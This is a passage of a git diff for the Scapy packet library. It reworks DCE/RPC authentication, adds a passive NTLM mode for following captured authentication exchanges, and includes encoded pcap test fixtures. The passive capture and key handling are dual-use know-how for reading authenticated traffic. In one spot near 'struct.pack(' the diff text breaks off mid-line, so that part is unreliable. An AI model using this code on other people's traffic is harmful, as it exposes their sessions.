**client.dcesockargs, + ) return client def connect(self, ip, port=None, timeout=5, smb_kwargs={}): @@ -117,9 +130,16 @@ def connect(self, ip, port=None, timeout=5, smb_kwargs={}): sock = self.smbrpcsock = SMB_RPC_SOCKET.from_tcpsock( sock, ssp=self.ssp, **smb_kwargs ) - self.sock = DceRpcSocket(sock, DceRpc5) + self.sock = DceRpcSocket(sock, DceRpc5, **self.dcesockargs) elif self.transport == DCERPC_Transport.NCACN_IP_TCP: - self.sock = DceRpcSocket(sock, DceRpc5, ssp=self.ssp) + self.sock = DceRpcSocket( + sock, + DceRpc5, + ssp=self.ssp, + auth_level=self.auth_level, + auth_context_id=self.auth_context_id, + **self.dcesockargs, + ) def close(self): if self.verb: @@ -128,30 +148,33 @@ def close(self): def sr1(self, pkt, **kwargs): self.call_id += 1 - return self.sock.sr1( + pkt = ( DceRpc5( call_id=self.call_id, pfc_flags="PFC_FIRST_FRAG+PFC_LAST_FRAG", endian=self.ndrendian, auth_verifier=kwargs.pop("auth_verifier", None), ) - / pkt, - verbose=0, - **kwargs, + / pkt ) + if "pfc_flags" in kwargs: + pkt.pfc_flags = kwargs.pop("pfc_flags") + return self.sock.sr1(pkt, verbose=0, **kwargs) def send(self, pkt, **kwargs): self.call_id += 1 - return self.sock.send( + pkt = ( DceRpc5( call_id=self.call_id, pfc_flags="PFC_FIRST_FRAG+PFC_LAST_FRAG", endian=self.ndrendian, auth_verifier=kwargs.pop("auth_verifier", None), ) - / pkt, - **kwargs, + / pkt ) + if "pfc_flags" in kwargs: + pkt.pfc_flags = kwargs.pop("pfc_flags") + return self.sock.send(pkt, **kwargs) def sr1_req(self, pkt, **kwargs): if self.verb: @@ -170,9 +193,8 @@ def sr1_req(self, pkt, **kwargs): else: if self.verb: if DceRpc5Fault in resp: - if ( - resp[DceRpc5Fault].payload and - not isinstance(resp[DceRpc5Fault].payload, conf.raw_layer) + if resp[DceRpc5Fault].payload and not isinstance( + resp[DceRpc5Fault].payload, conf.raw_layer ): resp[DceRpc5Fault].payload.show() if resp.status == 0x00000005: @@ -249,68 +271,119 @@ def _bind(self, interface, reqcls, respcls): + (" (with %s)" % self.ssp.__class__.__name__ if self.ssp else "") ) ) - if self.ssp and self.transport == DCERPC_Transport.NCACN_IP_TCP: + if not self.ssp or self.transport == DCERPC_Transport.NCACN_NP: # NCACN_NP = SMB does not bind the RPC securely, as it has already # authenticated during the SMB Session Setup - self.sspcontext, token, negResult = self.ssp.GSS_Init_sec_context( - self.sspcontext + resp = self.sr1( + reqcls(context_elem=self.get_bind_context(interface)), + auth_verifier=None, ) - if negResult not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: - print(conf.color_theme.fail( - "SSP failed on initial GSS_Init_sec_context !" - )) - if token: - token.show() - return False - pkt = self.sr1( - reqcls(context_elem=self.get_bind_context(interface)), - auth_verifier=None - if not self.sspcontext - else CommonAuthVerifier( - auth_type=self.ssp.auth_type, - auth_level=self.ssp.auth_level, - auth_value=token, - ), - ) - # Check context acceptance - if respcls in pkt and any( - x.result == 0 for x in pkt.results[: int(self.ndr64) + 1] - ): - self.call_id = 0 # reset call id - if self.sspcontext: - if self.ssp.LegsAmount(self.sspcontext) >= 3: + status = GSS_S_COMPLETE + else: + # Perform authentication + self.sspcontext, token, _ = self.ssp.GSS_Init_sec_context( + self.sspcontext, + req_flags=( + # SSPs need to be instantiated with some special flags + # for DCE/RPC usages. + GSS_C_FLAGS.GSS_C_DCE_STYLE + | GSS_C_FLAGS.GSS_C_REPLAY_FLAG + | GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG + | GSS_C_FLAGS.GSS_C_MUTUAL_FLAG + | ( + GSS_C_FLAGS.GSS_C_INTEG_FLAG + if self.auth_level >= DCE_C_AUTHN_LEVEL.PKT_INTEGRITY + else 0 + ) + | ( + GSS_C_FLAGS.GSS_C_CONF_FLAG + if self.auth_level >= DCE_C_AUTHN_LEVEL.PKT_PRIVACY + else 0 + ) + ), + ) + resp = self.sr1( + reqcls(context_elem=self.get_bind_context(interface)), + auth_verifier=( + None + if not self.sspcontext + else CommonAuthVerifier( + auth_type=self.ssp.auth_type, + auth_level=self.auth_level, + auth_context_id=self.auth_context_id, + auth_value=token, + ) + ), + pfc_flags=( + "PFC_FIRST_FRAG+PFC_LAST_FRAG" + + ( + # If the SSP supports "Header Signing", advertise it + "+PFC_SUPPORT_HEADER_SIGN" + if self.ssp is not None + and self.sock.session.support_header_signing + else "" + ) + ), + ) + if respcls not in resp: + token = None + status = GSS_S_FAILURE + else: + # Call the underlying SSP + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( + self.sspcontext, val=resp.auth_verifier.auth_value + ) + if status in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: + # Authentication should continue + if token and self.ssp.LegsAmount(self.sspcontext) % 2 == 1: # AUTH 3 for certain SSPs (e.g. NTLM) # "The server MUST NOT respond to an rpc_auth_3 PDU" - self.sspcontext, token, negResult = self.ssp.GSS_Init_sec_context( - self.sspcontext, - val=pkt.auth_verifier.auth_value, - ) - if negResult not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: - print(conf.color_theme.fail( - "SSP failed on subsequent GSS_Init_sec_context !" - )) - if token: - token.show() - return False self.send( DceRpc5Auth3(), - auth_verifier=None - if not self.ssp - else CommonAuthVerifier( + auth_verifier=CommonAuthVerifier( auth_type=self.ssp.auth_type, - auth_level=self.ssp.auth_level, + auth_level=self.auth_level, + auth_context_id=self.auth_context_id, auth_value=token, ), ) - if self.verb: - print( - conf.color_theme.opening( - ">> DceRpc5Auth3 on %s" % interface - ) + status = GSS_S_COMPLETE + else: + # Authentication can continue in two ways: + # - through DceRpc5Auth3 (e.g. NTLM) + # - through DceRpc5AlterContext (e.g. Kerberos) + while token: + respcls = DceRpc5AlterContextResp + resp = self.sr1( + DceRpc5AlterContext( + context_elem=self.get_bind_context(interface) + ), + auth_verifier=CommonAuthVerifier( + auth_type=self.ssp.auth_type, + auth_level=self.auth_level, + auth_context_id=self.auth_context_id, + auth_value=token, + ), ) + if respcls not in resp: + status = GSS_S_FAILURE + break + if resp.auth_verifier is None: + status = GSS_S_COMPLETE + break + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( + self.sspcontext, val=resp.auth_verifier.auth_value + ) + # Check context acceptance + if ( + status == GSS_S_COMPLETE + and respcls in resp + and any(x.result == 0 for x in resp.results[: int(self.ndr64) + 1]) + ): + self.call_id = 0 # reset call id + port = resp.sec_addr.port_spec.decode() ndr = self.sock.session.ndr64 and "NDR64" or "NDR32" self.cont_id = int(self.sock.session.ndr64) # ctx 0 for NDR32, 1 for NDR64 - port = pkt.sec_addr.port_spec.decode() if self.verb: print( conf.color_theme.success( @@ -321,16 +394,20 @@ def _bind(self, interface, reqcls, respcls): return True else: if self.verb: - if DceRpc5BindNak in pkt: - err_msg = {0: "Reason not specified"}.get( - pkt.provider_reject_reason, - "provider_reject_reason %s" % hex(pkt.provider_reject_reason), + if DceRpc5BindNak in resp: + err_msg = resp.sprintf( + "reject_reason: %DceRpc5BindNak.provider_reject_reason%" ) print(conf.color_theme.fail("! Bind_nak (%s)" % err_msg)) - elif DceRpc5Fault in pkt: - if pkt.status == 0x00000005: + if DceRpc5BindNak in resp: + if resp[DceRpc5BindNak].payload and not isinstance( + resp[DceRpc5BindNak].payload, conf.raw_layer + ): + resp[DceRpc5BindNak].payload.show() + elif DceRpc5Fault in resp: + if resp.status == 0x00000005: print(conf.color_theme.fail("! nca_s_fault_access_denied")) - elif pkt.status == 0x00000721: + elif resp.status == 0x00000721: print( conf.color_theme.fail( "! nca_s_fault_sec_pkg_error " @@ -339,10 +416,15 @@ def _bind(self, interface, reqcls, respcls): ) else: print(conf.color_theme.fail("! Failure")) - pkt.show() + resp.show() + if DceRpc5Fault in resp: + if resp[DceRpc5Fault].payload and not isinstance( + resp[DceRpc5Fault].payload, conf.raw_layer + ): + resp[DceRpc5Fault].payload.show() else: print(conf.color_theme.fail("! Failure")) - pkt.show() + resp.show() return False def bind(self, interface): @@ -357,6 +439,17 @@ def alter_context(self, interface): """ return self._bind(interface, DceRpc5AlterContext, DceRpc5AlterContextResp) + def bind_or_alter(self, interface): + """ + Bind the client to an interface or alter the context if already bound + """ + if not self.sock.session.rpc_bind_interface: + # No interface is bound + self.bind(interface) + else: + # An interface is already bound + self.alter_context(interface) + def open_smbpipe(self, name): """ Open a certain filehandle with the SMB automaton diff --git a/scapy/layers/msrpce/rpcserver.py b/scapy/layers/msrpce/rpcserver.py index ff1d9f64393..470ac914267 100644 --- a/scapy/layers/msrpce/rpcserver.py +++ b/scapy/layers/msrpce/rpcserver.py @@ -33,6 +33,7 @@ CommonAuthVerifier, DCE_RPC_INTERFACES, DCERPC_Transport, + RPC_C_AUTHN_LEVEL, ) # RPC @@ -232,7 +233,15 @@ def recv(self, data): conf.color_theme.opening( "<< %s" % req.payload.__class__.__name__ + ( - " (with %s)" % self.session.ssp.__class__.__name__ + " (with %s%s)" + % ( + self.session.ssp.__class__.__name__, + ( + f" - {self.session.auth_level.name}" + if self.session.auth_level is not None + else "" + ), + ) if self.session.ssp else "" ) @@ -257,12 +266,10 @@ def recv(self, data): ) = self.session.ssp.GSS_Accept_sec_context( self.session.sspcontext, req.auth_verifier.auth_value ) - try: - self.session.ssp.auth_level = req.auth_verifier.auth_level - except AttributeError: - # it is possible for the SSP to get unset, if there is a - # re-negotiation - pass + self.session.auth_level = RPC_C_AUTHN_LEVEL( + req.auth_verifier.auth_level + ) + self.session.auth_context_id = req.auth_verifier.auth_context_id if DceRpc5Auth3 in req: # Auth 3 stops here (no server response) ! if status != 0: @@ -275,6 +282,7 @@ def recv(self, data): hdr.auth_verifier = CommonAuthVerifier( auth_type=req.auth_verifier.auth_type, auth_level=req.auth_verifier.auth_level, + auth_context_id=req.auth_verifier.auth_context_id, auth_value=auth_value, ) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 094b3e6a5c6..eac32280f7a 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -6,7 +6,7 @@ """ NTLM -https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-NLMP/%5bMS-NLMP%5d.pdf +This is documented in [MS-NLMP] """ import copy @@ -28,56 +28,57 @@ from scapy.compat import bytes_base64 from scapy.error import log_runtime from scapy.fields import ( - Field, ByteEnumField, ByteField, ConditionalField, + Field, FieldLenField, FlagsField, + LEIntEnumField, LEIntField, - _StrField, LEShortEnumField, + LEShortField, + LEThreeBytesField, MultipleTypeField, PacketField, PacketListField, - LEShortField, StrField, StrFieldUtf16, StrFixedLenField, - LEIntEnumField, - LEThreeBytesField, StrLenFieldUtf16, UTCTimeField, XStrField, XStrFixedLenField, XStrLenField, + _StrField, ) from scapy.packet import Packet from scapy.sessions import StringBuffer from scapy.layers.gssapi import ( + GSS_C_FLAGS, + GSS_S_COMPLETE, + GSS_S_CONTINUE_NEEDED, + GSS_S_DEFECTIVE_CREDENTIAL, + GSS_S_DEFECTIVE_TOKEN, SSP, _GSSAPI_OIDS, _GSSAPI_SIGNATURE_OIDS, - GSS_S_CONTINUE_NEEDED, - GSS_S_COMPLETE, - GSS_S_DEFECTIVE_CREDENTIAL, ) -from scapy.layers.tls.crypto.hash import Hash_MD5 # Typing imports from typing import ( Any, Callable, List, + Optional, Tuple, Union, - Optional, ) # Crypto imports -from scapy.layers.tls.crypto.hash import Hash_MD4 +from scapy.layers.tls.crypto.hash import Hash_MD4, Hash_MD5 from scapy.layers.tls.crypto.h_mac import Hmac_MD5 ########## @@ -1154,6 +1155,7 @@ class CONTEXT(SSP.CONTEXT): __slots__ = [ "SessionKey", "ExportedSessionKey", + "IsAcceptor", "SendSignKey", "SendSealKey", "RecvSignKey", @@ -1167,7 +1169,7 @@ class CONTEXT(SSP.CONTEXT): "ServerHostname", ] - def __init__(self): + def __init__(self, IsAcceptor, req_flags=None): self.state = NTLMSSP.STATE.INIT self.SessionKey = None self.ExportedSessionKey = None @@ -1182,6 +1184,8 @@ def __init__(self): self.neg_tok = None self.chall_tok = None self.ServerHostname = None + self.IsAcceptor = IsAcceptor + super(NTLMSSP.CONTEXT, self).__init__(req_flags=req_flags) def __repr__(self): return "NTLMSSP" @@ -1301,27 +1305,29 @@ def getMechListMIC(self, Context, input): # "When NTLM is negotiated, the SPNG server MUST set OriginalHandle to # ServerHandle before generating the mechListMIC, then set ServerHandle to # OriginalHandle after generating the mechListMIC." - - # i.e. use a new RC4 handle - - return bytes(MAC(RC4Init(Context.SendSealKey), Context.SendSignKey, 0, input)) + OriginalHandle = Context.SendSealHandle + Context.SendSealHandle = RC4Init(Context.SendSealKey) + try: + return super(NTLMSSP, self).getMechListMIC(Context, input) + finally: + Context.SendSealHandle = OriginalHandle def verifyMechListMIC(self, Context, otherMIC, input): # [MS-SPNG] # "the SPNEGO Extension server MUST set OriginalHandle to ClientHandle before # validating the mechListMIC and then set ClientHandle to OriginalHandle after # validating the mechListMIC." + OriginalHandle = Context.RecvSealHandle + Context.RecvSealHandle = RC4Init(Context.RecvSealKey) + try: + return super(NTLMSSP, self).verifyMechListMIC(Context, otherMIC, input) + finally: + Context.RecvSealHandle = OriginalHandle - # i.e. again, use a new RC4 handle - - if otherMIC != bytes( - MAC(RC4Init(Context.RecvSealKey), Context.RecvSignKey, 0, input) - ): - raise ValueError("Bad mechListMIC !") - - def GSS_Init_sec_context(self, Context: CONTEXT, val=None): + def GSS_Init_sec_context(self, Context: CONTEXT, val=None, + req_flags: Optional[GSS_C_FLAGS] = None): if Context is None: - Context = self.CONTEXT() + Context = self.CONTEXT(False, req_flags=req_flags) if Context.state == self.STATE.INIT: # Client: negotiate @@ -1513,7 +1519,7 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if Context is None: - Context = self.CONTEXT() + Context = self.CONTEXT(True) if Context.state == self.STATE.INIT: # Server: challenge (val=negotiate) @@ -1647,6 +1653,68 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): else: raise ValueError("NTLMSSP: unexpected state %s" % repr(Context.state)) + def MaximumSignatureLength(self, Context: CONTEXT): + """ + Returns the Maximum Signature length. + + This will be used in auth_len in DceRpc5, and is necessary for + PFC_SUPPORT_HEADER_SIGN to work properly. + """ + return 16 # len(NTLMSSP_MESSAGE_SIGNATURE()) + + def GSS_Passive(self, Context: CONTEXT, val=None): + if Context is None: + Context = self.CONTEXT(True) + Context.passive = True + + # We capture the Negotiate, Challenge, then call the server's auth handling + # and discard the output. + + if Context.state == self.STATE.INIT: + if not val or NTLM_NEGOTIATE not in val: + log_runtime.warning("NTLMSSP: Expected NTLM Negotiate") + return None, GSS_S_DEFECTIVE_TOKEN + Context.neg_tok = val + Context.state = self.STATE.CLI_SENT_NEGO + return Context, GSS_S_CONTINUE_NEEDED + elif Context.state == self.STATE.CLI_SENT_NEGO: + if not val or NTLM_CHALLENGE not in val: + log_runtime.warning("NTLMSSP: Expected NTLM Challenge") + return None, GSS_S_DEFECTIVE_TOKEN + Context.chall_tok = val + Context.state = self.STATE.SRV_SENT_CHAL + return Context, GSS_S_CONTINUE_NEEDED + elif Context.state == self.STATE.SRV_SENT_CHAL: + if not val or NTLM_AUTHENTICATE_V2 not in val: + log_runtime.warning("NTLMSSP: Expected NTLM Authenticate") + return None, GSS_S_DEFECTIVE_TOKEN + Context, _, status = self.GSS_Accept_sec_context(Context, val) + if status != GSS_S_COMPLETE: + log_runtime.info("NTLMSSP: auth failed.") + Context.state = self.STATE.INIT + return Context, status + else: + raise ValueError("NTLMSSP: unexpected state %s" % repr(Context.state)) + + def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): + if Context.IsAcceptor is not IsAcceptor: + return + # Swap everything + Context.SendSignKey, Context.RecvSignKey = ( + Context.RecvSignKey, + Context.SendSignKey, + ) + Context.SendSealKey, Context.RecvSealKey = ( + Context.RecvSealKey, + Context.SendSealKey, + ) + Context.SendSealHandle, Context.RecvSealHandle = ( + Context.RecvSealHandle, + Context.SendSealHandle, + ) + Context.SendSeqNum, Context.RecvSeqNum = Context.RecvSeqNum, Context.SendSeqNum + Context.IsAcceptor = not Context.IsAcceptor + def _getSessionBaseKey(self, Context, auth_tok): """ Function that returns the SessionBaseKey from the ntlm Authenticate. diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 681ab564ef0..efee30ae548 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -882,7 +882,7 @@ def __init__( if ST is None: resp = krb_as_and_tgs( upn=UPN, - spn="host/%s" % hostname, + spn="cifs/%s" % hostname, password=password, debug=debug, ) diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index 67948c4d611..b47a06f7cde 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -43,10 +43,10 @@ MultipleTypeField, PacketField, PacketListField, + StrField, StrFixedLenField, UUIDEnumField, UUIDField, - StrField, XStrFixedLenField, XStrLenField, ) @@ -54,9 +54,11 @@ from scapy.layers.gssapi import ( GSSAPI_BLOB, + GSSAPI_BLOB_SIGNATURE, + GSS_C_FLAGS, + GSS_S_BAD_MECH, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, - GSS_S_BAD_MECH, SSP, _GSSAPI_OIDS, ) @@ -75,6 +77,7 @@ # Typing imports from typing import ( Dict, + Optional, Tuple, ) @@ -154,7 +157,6 @@ class SPNEGO_negHints(ASN1_Packet): class SPNEGO_negTokenInit(ASN1_Packet): - # actually it's SPNEGO_negTokenInit2 from [MS-SPNG] 2.2.1 ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_optional( @@ -295,10 +297,10 @@ def _NEGOEX_post_build(self, p, pay_offset, fields): offset = fields[field_name] # Offset if self.getfieldval(field_name + "BufferOffset") is None: - p = p[:offset] + struct.pack(" None: + ) -> None: """ Kerberos Key object. diff --git a/scapy/utils.py b/scapy/utils.py index 0286ed0e6b3..f5149c73e99 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -722,6 +722,18 @@ def strand(s1, s2): return b"".join(map(lambda x, y: chb(orb(x) & orb(y)), s1, s2)) +def strrot(s1, count, right=True): + # type: (bytes, int, bool) -> bytes + """ + Rotate the binary by 'count' bytes + """ + off = count % len(s1) + if right: + return s1[-off:] + s1[:-off] + else: + return s1[off:] + s1[:off] + + # Workaround bug 643005 : https://sourceforge.net/tracker/?func=detail&atid=105470&aid=643005&group_id=5470 # noqa: E501 try: socket.inet_aton("255.255.255.255") diff --git a/test/pcaps/dcerpc_privacy_krb.pcapng.gz b/test/pcaps/dcerpc_privacy_krb.pcapng.gz new file mode 100644 index 0000000000000000000000000000000000000000..0d17553efdf1805155d4e0852cd8c1d97a2579d1 GIT binary patch literal 6120 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 literal 0 HcmV?d00001 diff --git a/test/pcaps/dcerpc_privacy_ntlm.pcapng.gz b/test/pcaps/dcerpc_privacy_ntlm.pcapng.gz new file mode 100644 index 0000000000000000000000000000000000000000..1592d551f856797bbd83126c0a8602ca13e44a43 GIT binary patch literal 36763 zcmV(zK<2+6iwFpJLGon)17u@ma&Ti`aB^vOVPkn;ZggyIE^uREaBgP+-2G*69MA3s zjINoPnVFfHnPO&U#+ccTnVFd}W{#Qdn32B#_L8zi4#!Amj1pt5mPyw=*cCH?T?DS0ZjC4$#bcVJj z?5v;wF@UJ6t%I?l10kilrIV?%g`tx*6(K76*i=@*MX+i$sl%Pji09smFZ00Y1QZkA3)PD}s*)UTsZzmCHGAMybH zb}jg?X7V?h9G^Qeim=Kbgnx~HH|0-&&Tz(Ge-*esLH?2-z1vn#py2|P>{cQ z*cbe!|C7~Q43xD!2WB@{@-v=-T?mKX!Zm zmj%qxvAvr^DhR7-?J8@69q13A|2~%%x5WlIO;8NvZwUYLq{qME9{4BRVmD(C1;54x z|IKDeP*8ttCiHJMqyB|`{SWTE-?(A_;I{cE+@%=5{g#P^?Qi&j|D5^n+ke9a0s#3x zW)J)g!`~qNg+XcZVe{8`^S{|{<_7qW?O^`RcI&@zr2N6K{u=|}4~DY8VTk*~0OapX z{$u+)8kv9U!2l=#xPT5%cG0w-Y}L$ZKR5x1Ab$b>b>crQ{g_FdEx9Pczwo03ZvU1Y_z(W7 zzhO)Ihl2lO1Nw(7|8ng2_IIoOe^W2t5dK{+pg{i_dssqO{zrVf0r}$tCI62P=zT*F 